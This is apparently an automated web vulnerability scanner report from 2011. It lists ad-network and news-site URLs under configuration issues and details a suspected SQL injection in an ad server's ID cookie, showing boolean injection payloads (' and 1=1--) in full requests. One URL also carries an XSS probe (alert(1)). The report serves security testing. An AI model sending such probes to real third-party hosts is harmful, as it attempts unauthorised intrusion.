25.86. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYoYcDIMCIAyoUxcMAAP___________________w8yCaHDAAD_____Dw

25.87. http://safebrowsing.clients.google.com/safebrowsing/gethash

25.88. http://search.twitter.com/search.json

25.89. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

25.90. http://segment-pixel.invitemedia.com/pixel

25.91. http://speed.pointroll.com/PointRoll/Media/Banners/UnitedHealthcare/857298/uhc_interactive_n3_728x90_default.jpg

25.92. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.93. http://static.pulse360.com/blob/3c/66d319f2_guru_pennyacutionsimage.gif

25.94. http://stats.vodpod.com/stats/widget/651730/blank.gif

25.95. http://store.androidcentral.com/external_marketing/js_a_v1.php

25.96. http://sync.mathtag.com/sync/img

25.97. http://tag.admeld.com/ad/json

25.98. http://tag.contextweb.com/TagPublish/getad.aspx

25.99. http://talkingpointsmemo.com/archives/2010/02/remember_rick_santorum.php

25.100. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html

25.101. http://toolbarqueries.clients.google.com/tbproxy/af/query

25.102. http://tracking.adjug.com/AdJugTracking/Tracker.aspx

25.103. http://turn.nexac.com/r/pu

25.104. http://um.simpli.fi/pm_match

25.105. http://va.px.invitemedia.com/adnxs_imp

25.106. http://www.androidcentral.com/android-central-google-io-2011

25.107. http://www.facebook.com/plugins/like.php

25.108. http://www.gather.com/css/core_layout.css

25.109. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

25.110. http://www.google-analytics.com/__utm.gif

25.111. http://www.google.com/trends/hottrends

25.112. http://www.googleadservices.com/pagead/conversion/1030881291/

25.113. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html

25.114. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html

25.115. http://www.linkedin.com/analytics/

25.116. http://www.meebo.com/cim/sandbox.php

25.117. http://www.philly.com/philly/news/nation_world/121548659.html

25.118. http://www.ricksantorum.com/

25.119. http://www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/

25.120. http://www.smartphoneexperts.com/

25.121. http://www.tlsubmit.com/

25.122. http://www.ultraedit.com/updates/ultracompare/ucupdate.html

25.123. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

25.124. http://www.youtube.com/embed/Iev7TKsXoHo

26. Cacheable HTTPS response

26.1. https://secure.smartphoneexperts.com/javascripts/highslide412/graphics/zoomout.cur

26.2. https://support.ccbill.com/

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

27.2. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2

27.3. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.7

27.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

27.5. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3

27.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

27.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.20

27.8. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2

27.9. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6

27.10. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10

27.11. http://ad.doubleclick.net/adi/huffpost.politics/news

27.12. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech

27.13. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

27.14. http://ad.doubleclick.net/pfadx/philly_cim/

27.15. http://ad.yieldmanager.com/iframe3

27.16. http://ads.pointroll.com/PortalServe/

27.17. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

27.18. http://ads.specificmedia.com/serve/v=5

27.19. http://adsfac.us/ag.asp

27.20. http://afe.specificclick.net/

27.21. http://amch.questionmarket.com/adscgen/sta.php

27.22. http://bidder.mathtag.com/iframe/notify

27.23. http://bn.xp1.ru4.com/nf

27.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.25. http://cdn.slashgear.com/fbrecom.html

27.26. http://content.pulse360.com/7258D0CE-DD27-11DF-A9B2-6F2BEDADD848

27.27. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90

27.28. http://fast.ziffdavis.demdex.net/DSD-gz/ziffdavis-dest.html

27.29. http://geek.us.intellitxt.com/iframescript.jsp

27.30. http://image3.pubmatic.com/AdServer/UPug

27.31. http://load.exelator.com/load/

27.32. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

27.33. http://mediacdn.disqus.com/1304984847/build/system/def.html

27.34. http://mediacdn.disqus.com/1304984847/build/system/reply.html

27.35. http://mediacdn.disqus.com/1304984847/build/system/upload.html

27.36. http://p.brilig.com/contact/bct

27.37. http://ping.chartbeat.net/ping

27.38. http://pixel.intellitxt.com/pixel.jsp

27.39. http://pixel.invitemedia.com/data_sync

27.40. http://q1.checkm8.com/adam/detect

27.41. https://secure.smartphoneexperts.com/

27.42. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

27.43. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg

27.44. http://store.androidcentral.com/

27.45. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm

27.46. http://store.androidcentral.com/cart.htm

27.47. http://store.androidcentral.com/content/customercare/index.htm

27.48. http://store.androidcentral.com/content/customercare/page-shipping.htm

27.49. http://store.androidcentral.com/favicon.ico

27.50. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm

27.51. http://store.androidcentral.com/motorola-droid-x-batteries.htm

27.52. http://store.androidcentral.com/motorola-droid-x-bluetooth.htm

27.53. http://store.androidcentral.com/motorola-droid-x-headsets.htm

27.54. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

27.55. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold

27.56. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold

27.57. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo

27.58. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo

27.59. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

27.60. http://tags.bluekai.com/site/2554

27.61. http://uac.advertising.com/wrapper/aceUACping.htm

27.62. http://w55c.net/ct/cms-2-frame.html

27.63. http://www.slashgear.com/ads/rpufallover.html

27.64. http://www.spreadingsantorum.com/

27.65. http://www.spreadingsantorum.com/santorum_us1.html

27.66. http://www.spreadingsantorum.com/santorumsqueeze.html

27.67. http://www.tlsubmit.com/affiliate_signup.html

28. Content type incorrectly stated

28.1. http://a1.interclick.com/getInPageJS.aspx

28.2. http://a1.interclick.com/getInPageJSProcess.aspx

28.3. http://ad.bnmla.com/serve

28.4. http://ad.doubleclick.net/pfadx/philly_cim/

28.5. http://admeld.lucidmedia.com/clicksense/admeld/match

28.6. http://ads.pointroll.com/PortalServe/

28.7. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

28.8. http://ads.trove.com/RevenuePlatform/ad/pong

28.9. http://adsfac.us/ag.asp

28.10. http://afe.specificclick.net/

28.11. http://amch.questionmarket.com/adscgen/sta.php

28.12. http://api.js-kit.com/v1/bus/washpost.com/channel/130503326439488483

28.13. http://ar.voicefive.com/b/rc.pli

28.14. http://beacon.videoegg.com/admeldtest

28.15. http://beacon.videoegg.com/btf

28.16. http://beacon.videoegg.com/initjs

28.17. http://beacon.videoegg.com/invpos

28.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.19. http://chat.livechatinc.net/licence/1051282/script.cgi

28.20. http://content.pulse360.com/7258D0CE-DD27-11DF-A9B2-6F2BEDADD848

28.21. http://digg.com/tools/services

28.22. http://event.adxpose.com/event.flow

28.23. http://flash.qoof.com/widget.js.aspx

28.24. http://forum.androidcentral.com/external.php

28.25. http://hs.interpolls.com/cache/tmobile/affordability/300/inter_85.poll

28.26. http://hs.interpolls.com/cache/tmobile/affordability/300/inter_86.poll

28.27. http://hs.interpolls.com/imprimage.poll

28.28. http://hs.interpolls.com/ts1.poll

28.29. http://id.expressnightout.com/identity/public/visitor.json

28.30. http://id.slate.com/identity/public/visitor.json

28.31. http://id.theroot.com/identity/public/visitor.json

28.32. http://id.trove.com/identity/public/visitor.json

28.33. http://id.washingtonpost.com/identity/public/visitor/create

28.34. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json

28.35. http://id.washingtonpost.com/identity/public/visitor/ip_address.json

28.36. http://image3.pubmatic.com/AdServer/UPug

28.37. http://imp.fetchback.com/serve/fb/adtag.js

28.38. http://letters.salon.com/favicon.ico

28.39. http://map.media6degrees.com/orbserv/hbjs

28.40. http://media.washingtonpost.com/wp-srv/ad/blog_147x41.js

28.41. http://media.washingtonpost.com/wp-srv/css/globalNav.css

28.42. http://mediacdn.disqus.com/1304984847/fonts/disqus-webfont.woff

28.43. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.img

28.44. http://optimized-by.rubiconproject.com/a/8430/13646/27091-2.img

28.45. http://paidcontent.org/images/site/favicon_mn.ico

28.46. http://pglb.buzzfed.com/10032/5aa834d4bb2efeab1df676685da0518c

28.47. http://ping.crowdscience.com/ping.js

28.48. http://pixel.intellitxt.com/pixel.jsp

28.49. http://politics.gather.com/js/siteReport.js.jspf

28.50. http://q1.checkm8.com/adam/detect

28.51. http://rt.disqus.com/forums/realtime-cached.js

28.52. http://s0.2mdn.net/1560758/Contests_728x90.gif

28.53. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php

28.54. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php

28.55. http://static.pulse360.com/blob/3c/66d319f2_guru_pennyacutionsimage.gif

28.56. http://ultraedit.app7.hubspot.com/salog.js.aspx

28.57. http://www.facebook.com/extern/login_status.php

28.58. http://www.geek.com/wp-content/themes/geek6/scripts/ajax_actions.js.php

28.59. http://www.geek.com/wp-content/themes/geek6/scripts/commonjs.php

28.60. http://www.geek.com/wp-content/themes/geek6/scripts/search.js.php

28.61. http://www.huffingtonpost.com/ads/check_flights.php

28.62. http://www.huffingtonpost.com/badge/badges_json_v2.php

28.63. http://www.knowyourmobile.com/img/bullet_red.gif

28.64. http://www.knowyourmobile.com/img/icon_delicious.gif

28.65. http://www.knowyourmobile.com/img/icon_digg.gif

28.66. http://www.knowyourmobile.com/img/icon_facebook.gif

28.67. http://www.knowyourmobile.com/img/icon_furl.gif

28.68. http://www.knowyourmobile.com/img/icon_stumbleupon.gif

28.69. http://www.knowyourmobile.com/img/navBackg.gif

28.70. http://www.knowyourmobile.com/img/rsslogo.gif

28.71. http://www.spreadingsantorum.com/index.rdf

28.72. http://www.surveygizmo.com/s3/polljs/539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H/

28.73. http://www.symbiosting.com/LogicBuy/geek/content-syndicate.php

28.74. http://www.ultraedit.com/favicon.ico

28.75. http://www.ultraedit.com/updates/ultracompare/ucupdates2

29. Content type is not specified

29.1. http://ad.trafficmp.com/a/js

29.2. http://ad.yieldmanager.com/st

29.3. http://pcm1.map.pulsemgr.com/uds/pc

29.4. http://pcm2.map.pulsemgr.com/uds/pc

29.5. http://tag.contextweb.com/TagPublish/getad.aspx

29.6. http://tracking.skyword.com/tracker.js

29.7. http://www.meebo.com/cmd/tc

30. SSL certificate

30.1. https://secure.smartphoneexperts.com/

30.2. https://support.ccbill.com/



1. SQL injection  next
There are 29 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.amgdgt.com/ads/ [ID cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The ID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=60913016647100450&clkurl=http://ib.adnxs.com/click/H4XrUbgeAUAfhetRuB4BQAAAAKCZmQlAmpmZmZmZCUCamZmZmZkJQFFFHlTWPNEMSsYda6b2ziU7OslNAAAAABUbAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgC1GHIAPhABAgUCAAQAAAAAPCEvmAAAAAA./cnd=!kR7geQi_kAMQyMkKGAAg0ccBMAA4tTFAAEiWBVAAWABg2gFoAHCsAnj8W4AB9gSIAaQUkAEBmAEBoAEDqAEDsAEBuQEAAACgmZkJQMEBAAAAoJmZCUDJAbjdQpCsz7k_0AEA/referrer=http%3A%2F%2Fwww.androidcentral.com%2Fandroid-central-google-io-2011/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB3vh7OzrJTeDtMse36Qbe6eiBDtfq-NMBr56U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTE0OTkyOTE0OTEwODQ3oAHD8v3sA7IBFnd3dy5hbmRyb2lkY2VudHJhbC5jb226AQk3Mjh4OTBfYXPIAQnaATxodHRwOi8vd3d3LmFuZHJvaWRjZW50cmFsLmNvbS9hbmRyb2lkLWNlbnRyYWwtZ29vZ2xlLWlvLTIwMTGYAtwQwAIEyAKF0s8KqAMB6AOOCOgDrwjoA-gE6AOTCfUDAAAAxIAG--Ohhf7g767AAQ%26num%3D1%26sig%3DAGiWqtyPZXDoeqgWv10Nz_yf_zYwhy0uEQ%26client%3Dca-pub-9914992914910847%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--'%20and%201%3d1--%20; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUNCYV.fzBKzXiM_IlgLbxozis.EcDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDcHKmVgCLzFKMgITFY7GfmBFIMBPwMTEz8zIwsjKyMbIzsjByMnIxcjNyMPIy8jH1gJSyajCFDl0gKwPgUziGAIkwijKFBYfhcPbq2L3RmB7gOl34z5U0BuYWAAAI6Mla4-

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUYGo0nk8a73lDHZRXSGxC4Xj5Q.4AAGnnbqfYNksGmO3Sj_V0qlYAAAEv2iUwwg--; Domain=.amgdgt.com; Expires=Fri, 07-May-2021 13:42:41 GMT; Path=/
Set-Cookie: UA=AAAAAQAUVnGtjbSHRthVuiIOriMwdo2_m88DA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv1bqgaHoHKtQLkfQDlXmNzVtJOfccqlvmHAZeaRfwuscOnb5NGZgUvfxptxk6FyLUC3_AS6xQ3mlo3mN01w6jNP18ctJwF0Z.cSoN.bgWb.AprpDjNzkn6EP1QOw..9HNu8oXIYbunlcOnHJdeRHXMKp1yS23WcchFe13DK.U0IwSnn2sABlcOI2w4J99s49UnYaePS135y5yZgGDHi0tte2S0ElGfwPdHAwMDFwLDcnImBkZGRgSHwFqMQkOLcySgApBgMBBmYGBmZ.JgZWRhZGdkY2Rk5GDkZuRi5GXkYeRn5GPnBylgyGUWBqpcWgPUqmEEEQ5hEGcWAwvK7eHBrXewOthaaikFOYgAALdmVAg--; Domain=.amgdgt.com; Expires=Thu, 09-Jun-2011 13:42:41 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5467
Date: Tue, 10 May 2011 13:42:40 GMT

_289670_amg_acamp_id=172249;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=35491822/rnd=35491822?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlLyLmGcZo6fsAAQuvRbcQO6Nn5RnZW8sdXNhLHQsMTMwNTAzNDk2MTA5MSxjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZXI9aHR0cDovL3d3dy5hbmRyb2lkY2VudHJhbC5jb20vYW5kcm9pZC1jZW50cmFsLWdvb2dsZS1pby0yMDExL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIzdmg3T3pySlRlRHRNc2UzNlFiZTZlaUJEdGZxLU5NQnI1NlU3Qmpyd3UzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESmhvV0ppS1NFRUlJQkYyTmhMWEIxWWkwNU9URTBPVGt5T1RFME9URXdPRFEzb0FIRDh2M3NBN0lCRm5kM2R5NWhibVJ5YjJsa1kyVnVkSEpoYkM1amIyMjZBUWszTWpoNE9UQmZZWFBJQVFuYUFUeG9kSFJ3T2k4dmQzZDNMbUZ1WkhKdmFXUmpaVzUwY21Gc0xtTnZiUzloYm1SeWIybGtMV05sYm5SeVlXd3RaMjl2WjJ4bExXbHZMVEl3TVRHWUF0d1F3QUlFeUFLRjBzOEtxQU1CNkFPT0NPZ0Ryd2pvQS1nRTZBT1RDZlVEQUFBQXhJQUctLU9oaGY3Zzc2N0FBUSZudW09MSZzaWc9QUdpV3F0eVBaWERvZXFnV3YxME56X3lmX3pZd2h5MHVFUSZjbGllbnQ9Y2EtcHViLTk5MTQ5OTI5MTQ5MTA4NDcmYWR1cmw9Cg--/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlLyLmGcZo6fsAAQuvRbcQO6Nn5RnZW8sdXNhLHQsMTMwNTAzNDk2MTA5MSxjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZXI9aH
...[SNIP]...

Request 2

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=60913016647100450&clkurl=http://ib.adnxs.com/click/H4XrUbgeAUAfhetRuB4BQAAAAKCZmQlAmpmZmZmZCUCamZmZmZkJQFFFHlTWPNEMSsYda6b2ziU7OslNAAAAABUbAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgC1GHIAPhABAgUCAAQAAAAAPCEvmAAAAAA./cnd=!kR7geQi_kAMQyMkKGAAg0ccBMAA4tTFAAEiWBVAAWABg2gFoAHCsAnj8W4AB9gSIAaQUkAEBmAEBoAEDqAEDsAEBuQEAAACgmZkJQMEBAAAAoJmZCUDJAbjdQpCsz7k_0AEA/referrer=http%3A%2F%2Fwww.androidcentral.com%2Fandroid-central-google-io-2011/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB3vh7OzrJTeDtMse36Qbe6eiBDtfq-NMBr56U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTE0OTkyOTE0OTEwODQ3oAHD8v3sA7IBFnd3dy5hbmRyb2lkY2VudHJhbC5jb226AQk3Mjh4OTBfYXPIAQnaATxodHRwOi8vd3d3LmFuZHJvaWRjZW50cmFsLmNvbS9hbmRyb2lkLWNlbnRyYWwtZ29vZ2xlLWlvLTIwMTGYAtwQwAIEyAKF0s8KqAMB6AOOCOgDrwjoA-gE6AOTCfUDAAAAxIAG--Ohhf7g767AAQ%26num%3D1%26sig%3DAGiWqtyPZXDoeqgWv10Nz_yf_zYwhy0uEQ%26client%3Dca-pub-9914992914910847%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--'%20and%201%3d2--%20; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUNCYV.fzBKzXiM_IlgLbxozis.EcDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDcHKmVgCLzFKMgITFY7GfmBFIMBPwMTEz8zIwsjKyMbIzsjByMnIxcjNyMPIy8jH1gJSyajCFDl0gKwPgUziGAIkwijKFBYfhcPbq2L3RmB7gOl34z5U0BuYWAAAI6Mla4-

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUFnAZLJAYnZCQqKLDoGMELWRESL8AAPigs5WyP0ZKmWY5_ClDWN8AAAEv2iU2Cg--; Domain=.amgdgt.com; Expires=Fri, 07-May-2021 13:42:42 GMT; Path=/
Set-Cookie: UA=AAAAAQAUjCULET8mbtaeXKfDDnJrHKPwibADA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv1bqmZcULlWoNwPoJwrTO5q2snPOOVS3zDgMvPIvwVWuPRt8ujMwKVv4824yVC5FqBbfgLd4gZzy0bzmyY49Zmn6.OWkwC6s3MJ0O_NQDN_Ac10h5k5ST_CHyqH4fdejm3eUDkMt_RyuPTjkuvIjjmFUy7J7TpOuQivazjl_CaE4JRzbeCAymHEbYeE.22c.iTstHHpaz.5cxMwjBhx6W2v7BYCyjP4nmhgYOBiYFhuzsTAyMjIwBB4i1EISHHuZBQAUgwGggxMjIxMfMyMLIysjGyM7IwcjJyMXIzcjDyMvIx8jPxgZSyZjKJA1UsLwHoVzCCCIUyijGJAYfldPLi1LnYHWwtNxSAnMQAANl.Tng--; Domain=.amgdgt.com; Expires=Thu, 09-Jun-2011 13:42:42 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5477
Date: Tue, 10 May 2011 13:42:41 GMT

_289670_amg_acamp_id=172249;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=2050074284/rnd=2050074284?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUY1Hkw5VHgyhvrSCoNeyiAbFdTk9nZW8sdXNhLHQsMTMwNTAzNDk2MjQ0MixjLDI4OTY3MCxwYyw2OTExMSxhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQVVBZmhldFJ1QjRCUUFBQUFLQ1ptUWxBbXBtWm1abVpDVUNhbVptWm1aa0pRRkZGSGxUV1BORU1Tc1lkYTZiMnppVTdPc2xOQUFBQUFCVWJBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0MxR0hJQVBoQUJBZ1VDQUFRQUFBQUFQQ0V2bUFBQUFBQS4vY25kPSFrUjdnZVFpX2tBTVF5TWtLR0FBZzBjY0JNQUE0dFRGQUFFaVdCVkFBV0FCZzJnRm9BSENzQW5qOFc0QUI5Z1NJQWFRVWtBRUJtQUVCb0FFRHFBRURzQUVCdVFFQUFBQ2dtWmtKUU1FQkFBQUFvSm1aQ1VESkFiamRRcENzejdrXzBBRUEvcmVmZXJyZXI9aHR0cDovL3d3dy5hbmRyb2lkY2VudHJhbC5jb20vYW5kcm9pZC1jZW50cmFsLWdvb2dsZS1pby0yMDExL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIzdmg3T3pySlRlRHRNc2UzNlFiZTZlaUJEdGZxLU5NQnI1NlU3Qmpyd3UzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESmhvV0ppS1NFRUlJQkYy